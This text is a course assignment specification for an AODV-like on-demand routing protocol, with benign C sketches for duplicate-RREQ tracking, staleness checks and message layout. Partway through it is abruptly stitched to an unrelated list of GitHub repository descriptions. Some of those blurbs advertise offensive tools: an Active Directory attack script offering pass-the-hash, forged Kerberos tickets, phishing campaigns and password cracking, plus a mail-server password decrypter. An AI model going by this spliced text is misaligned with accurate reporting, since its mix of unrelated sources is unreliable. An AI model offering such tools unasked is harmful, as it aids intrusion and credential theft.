ODR may, of course, receive multiple, distinct instances of the same RREQ (the combination of source_addr and broadcast_id uniquely identifies the RREQ). Such RREQs should not be flooded out unless they have a lower hop count than the instances of that RREQ previously received. By the same token, if ODR is in a position to send out a RREP, and has already done so for this, now repeating, RREQ, it should not send out another RREP unless the RREQ shows a more efficient, previously unknown, reverse route back to the source node. In other words, ODR should not generate essentially duplicative RREPs, nor generate RREPs in response to instances of RREQs that reflect reverse routes to the source that are no more efficient than what we already have. A sketch of one way to track this appears below.
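As a sketch of this bookkeeping: remember, per <source_addr, broadcast_id> pair, the best hop count seen so far, and re-flood a repeated RREQ only if it arrives with fewer hops. The fixed-size cache and all names below are assumptions.

#include <string.h>
#include <netinet/in.h>        /* INET_ADDRSTRLEN */

struct rreq_seen {
    char src_ip[INET_ADDRSTRLEN];
    unsigned int broadcast_id;
    int best_hops;
    int in_use;
};
static struct rreq_seen seen[256];   /* sized arbitrarily for this sketch */

/* Returns 1 if this RREQ instance should be flooded onward, 0 if it is
   a duplicate that carries no better reverse route. */
int should_reflood(const char *src_ip, unsigned int bid, int hops)
{
    int i, free_slot = -1;
    for (i = 0; i < 256; i++) {
        if (!seen[i].in_use) { if (free_slot < 0) free_slot = i; continue; }
        if (seen[i].broadcast_id == bid && strcmp(seen[i].src_ip, src_ip) == 0) {
            if (hops < seen[i].best_hops) { seen[i].best_hops = hops; return 1; }
            return 0;                 /* duplicate, no better route */
        }
    }
    if (free_slot >= 0) {             /* first sighting of this RREQ */
        strncpy(seen[free_slot].src_ip, src_ip, INET_ADDRSTRLEN - 1);
        seen[free_slot].src_ip[INET_ADDRSTRLEN - 1] = '\0';
        seen[free_slot].broadcast_id = bid;
        seen[free_slot].best_hops = hops;
        seen[free_slot].in_use = 1;
    }                                 /* if the cache is full, we still flood */
    return 1;
}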
(4) Relay received RREPs back to the source node (this is done using the ‘reverse’ route entered into the routing table when the corresponding RREQ was processed). At the same time, a ‘forward’ path to the destination is entered into the routing table. ODR could receive multiple, distinct RREPs for the same RREQ. The ‘forward’ route entered in the routing table should be updated to reflect the shortest-hop route to the destination, and RREPs reflecting suboptimal routes should not be relayed back to the source. In general, maintaining a route and its associated timestamp in the table in response to RREPs received is done in the same manner described above for RREQs.

(5) Forward time client/server messages along the next hop. (The following is important – you will lose points if you do not implement it.) Note that such application payload messages (especially if they are the initial request from the client to the server, rather than the server response back to the client) can act like “free” RREPs, enabling nodes along the path from the source (client) node to the destination (server) node to build a reverse path back to a client node whose existence they were heretofore unaware of (or, possibly, to update an existing route with a more optimal one). Before it forwards an application payload message along the next hop, ODR at an intermediate node (and also at the final destination node) should use the message to update its routing table in this way. Thus, calls to msg_send by time servers should never cause ODR at the server node to initiate RREQs, since the receipt of a time client request implies that a route back to the client node should now exist in the routing table. The only exception to this is if the server node has a staleness parameter of zero (see below).

A routing table entry has associated with it a timestamp that gives the time the entry was made into the table. When a client at a node calls msg_send, and an entry for the destination node already exists in the routing table, ODR first checks that the routing information is not ‘stale’. A stale routing table entry is one that is older than the value defined by the staleness parameter given as a command line argument to the ODR process when it is executed. ODR deletes stale entries (as well as non-stale entries when the flag parameter in msg_send is set) and initiates a route rediscovery by issuing a RREQ for the destination node. This will force periodic updating of the routing tables, to take care of failed nodes along the current path, Ethernet addresses that might have changed, and so on. Similarly, as RREQs propagate through the intranet, existing stale table entries at intermediate nodes are deleted and new route discoveries propagated. As noted above when discussing the processing of RREQs and RREPs, the timestamp for an existing table entry is updated in response to having the route either “reconfirmed” or updated (this applies both to reverse routes, by virtue of RREQs received, and to forward routes, by virtue of RREPs).

Finally, note that a staleness parameter of 0 essentially indicates that a discovered route will be used only once, when first discovered, and then discarded. Effectively, an ODR with staleness parameter 0 maintains no real routing table at all; instead, it forces route discoveries at every step of its operation. As a practical matter, ODR should be run with staleness parameter values that are considerably larger than the longest RTT on the intranet, otherwise performance will degrade considerably (and collapse entirely as the parameter value approaches 0). Nevertheless, for robustness, we need to implement a mechanism by which an intermediate node that receives a RREP or application payload message for forwarding, and finds that its relevant routing table entry has since gone stale, can initiate a RREQ to rediscover the route it needs.
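The staleness test itself is then a small comparison against the command-line parameter; a sketch, assuming the timestamp field from the routing-table entry sketched earlier:

#include <time.h>

/* Sketch: an entry is stale once it is older than the staleness
   parameter (in seconds). The special case of 0 is treated as
   "never reuse a route", matching the behaviour described above. */
int is_stale(time_t entry_timestamp, long staleness)
{
    if (staleness == 0)
        return 1;
    return (time(NULL) - entry_timestamp) > staleness;
}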
RREQ, RREP, and time client/server request/response messages will all have to be carried as encapsulated ODR protocol messages that form the data payload of Ethernet frames. So we need to design the structure of ODR protocol messages. The format should contain a type field (0 for RREQ, 1 for RREP, 2 for application payload). The remaining fields in an ODR message will depend on its type. The fields needed for (our simplified versions of AODV’s) RREQ and RREP should be fairly clear to you, but keep in mind that you need to introduce two extra fields:

- The “RREP already sent” bit or field in RREQ messages, as mentioned above.
- A “forced discovery” bit or field in both RREQ and RREP messages. When a client application forces route rediscovery, this bit should be set in the RREQ issued by the client node ODR. Intermediate nodes that are not the destination node, but which do have a route to the destination node, should not respond with RREPs to a RREQ which has the forced discovery field set. Instead, they should continue to flood the RREQ so that it eventually reaches the destination node, which will then respond with a RREP. The intermediate nodes relaying such a RREQ must update their ‘reverse’ route back to the source node accordingly, even if the new route is less efficient (i.e., has more hops) than the one they currently have in their routing table. The destination node responds to the RREQ with a RREP in which this field is also set. Intermediate nodes that receive such a forced discovery RREP must update their ‘forward’ route to the destination node accordingly, even if the new route is less efficient than the one they currently have in their routing table. This behaviour will cause a forced discovery RREQ to be responded to only by the destination node itself and not any other node, and will cause intermediate nodes to update their routing tables to both the source and destination nodes in accordance with the latest routing information received, to cover the possibility that older routes are no longer valid because nodes and/or links along their paths have gone down.

A type 2, application payload, message needs to contain the following information:

- type = 2
- ‘canonical’ IP address of the source node
- ‘port’ number of the source application process (this, of course, is not a real port number in the TCP/UDP sense, but simply a value that ODR at the source node uses to designate the sun_path name for the source application’s domain socket)
- ‘canonical’ IP address of the destination node
- ‘port’ number of the destination application process (this is passed to ODR by the application process at the source node when it calls msg_send; it designates the sun_path name for an application’s domain socket at the destination node)
- hop count (this starts at 0 and is incremented by 1 at each hop, so that ODR can make use of the message to update its routing table, as discussed above)
- number of bytes in the application message

The fields above essentially constitute a ‘header’ for the ODR message. Note that fields which you choose to have carry numeric values (rather than ascii characters, for example) must be in network byte order. ODR-defined numeric-valued fields in type 0, RREQ, and type 1, RREP, messages must, of course, also be in network byte order. Also note that only the ‘canonical’ IP addresses are used for the source and destination nodes in the ODR header. The same has to be true in the headers for type 0, RREQ, and type 1, RREP, messages. The general rule is that ODR messages carry only ‘canonical’ IP node addresses.

The last field in the type 2 ODR message is essentially the data payload of the message:

- application message given in the call to msg_send

An ODR protocol message is encapsulated as the data payload of an Ethernet frame whose header is filled in as follows:

- source address = Ethernet address of the outgoing interface of the current node where ODR is processing the message
- destination address = Ethernet broadcast address for type 0 messages; Ethernet address of the next-hop node for type 1 & 2 messages
- protocol field = protocol value for the ODR PF_PACKET socket(s)
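Pulling the type 2 ‘header’ fields together, one possible in-memory layout is sketched below. The field widths, the fixed-size payload buffer, and carrying the IPs as presentation-format strings are all assumptions (you could equally carry 4-byte binary addresses), and the multi-byte numeric fields must still be converted with htonl/htons before the frame is written out.

#include <stdint.h>
#include <netinet/in.h>        /* INET_ADDRSTRLEN */

#define ODR_RREQ 0
#define ODR_RREP 1
#define ODR_DATA 2
#define ODR_MAX_PAYLOAD 1400   /* assumption: fits in one Ethernet frame */

/* Sketch of a type 2 (application payload) ODR message. */
struct odr_msg {
    uint8_t  type;                    /* 0 = RREQ, 1 = RREP, 2 = payload   */
    char     src_ip[INET_ADDRSTRLEN]; /* 'canonical' IP of source node     */
    uint32_t src_port;                /* source application 'port'         */
    char     dst_ip[INET_ADDRSTRLEN]; /* 'canonical' IP of destination     */
    uint32_t dst_port;                /* destination application 'port'    */
    uint32_t hop_count;               /* starts at 0, +1 at each hop       */
    uint32_t msg_len;                 /* bytes in the application message  */
    char     data[ODR_MAX_PAYLOAD];   /* the application message itself    */
};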
Last but not least, whenever ODR writes an Ethernet frame out through its socket, it prints out on stdout the message

ODR at node vm i1 : sending frame hdr src vm i1 dest addr ODR msg type n src vm i2 dest vm i3

where addr is in presentation format (i.e., hexadecimal xx:xx:xx:xx:xx:xx) and gives the destination Ethernet address in the outgoing frame header. Other nodes in the message should be identified by their vm names. A message should be printed out for each packet sent out on a distinct interface.

ODR and the API

When the ODR process first starts, it must construct a table in which it enters all well-known ‘port’ numbers and their corresponding sun_path names. These will constitute permanent entries in the table. Thereafter, whenever it reads a message off its domain socket, it must obtain the sun_path name of the peer process socket and check whether that name is entered in the table. If not, it must select an ‘ephemeral’ ‘port’ value by which to designate the peer sun_path name, and enter the pair < port value , sun_path name > into the table. Such entries cannot be permanent, otherwise the table will grow unboundedly in time, with entries surviving forever, beyond the peer processes’ demise. We must therefore associate a time_to_live field with each non-permanent table entry, and purge the entry if nothing is heard from the peer for that amount of time. Every time a peer process for which a non-permanent table entry exists communicates with ODR, its time_to_live value should be reinitialized. Note that when ODR writes to a peer, it is possible for the write to fail because the peer does not exist: it could be a ‘well-known’ service that is not running, or we could be in the interval between a process with a non-permanent table entry terminating and the expiration of its time_to_live value.

Notes

A proper implementation of ODR would probably require that RREQ and RREP messages be backed up by some kind of timeout and retransmission mechanism, since the network transmission environment is not reliable. This would considerably complicate the implementation (because at any given moment a node could have multiple RREQs that it has flooded out but for which it has still not received RREPs; the situation is further complicated by the fact that not all intermediate nodes receiving and relaying RREQs necessarily lie on a path to the destination, and so not all of them should expect to receive RREPs), and, learning-wise, would not add much to the experience you should have gained from Assignment 2.
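One possible shape for the entries of this < ‘port’, sun_path > table is sketched below; the names and the TTL bookkeeping are assumptions.

#include <time.h>

/* Sketch: one entry of ODR's <'port' value, sun_path name> table.
   Permanent entries (well-known servers) ignore the TTL fields. */
struct port_entry {
    int port;                  /* well-known or ephemeral 'port' value     */
    char sun_path[108];        /* peer socket pathname; 108 matches the    */
                               /* size of sun_path on Linux                */
    int permanent;             /* 1 for well-known entries, 0 otherwise    */
    time_t last_heard;         /* refreshed each time the peer writes      */
    long ttl;                  /* purge when now - last_heard exceeds ttl  */
    struct port_entry *next;
};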
kozmic / Js Library Xss Fuzzer
JavaScript library fuzzer. Tries to detect functions which may lead to XSS vulnerabilities if untrusted data is passed to them.
SirJohnFranklin / Nist Asd
A class which parses the NIST Atomic Spectra Database and saves the data to a dictionary on disk. You can pass a matplotlib.axis, and the emission lines will be plotted with an optional normalization factor.
integer-net / LocalStorage
Magento 1 extension: provides an interface to pass data from the server to client-side localStorage, to be used with a full page cache (for example Varnish).
BroadbentT / ROGUE AGENT
A Python script to forensically examine remote computer networks. It can analyse SMB and LDAP Active Directory systems, start phishing campaigns, extract hidden data such as subdomains, security identifiers, usernames and encrypted passwords; utilise pass-the-hash techniques, crack and auto-import ntds.dit files, create on-demand golden and silver Kerberos tickets and... well, so much more...
GitMirar / HMailDatabasePasswordDecrypter
Decrypts the Blowfish-encrypted (with a static key) hMail database password.
botprof / First Order Low Pass Filter
This Jupyter notebook shows one way to implement a simple first-order low-pass filter on sampled data in discrete time.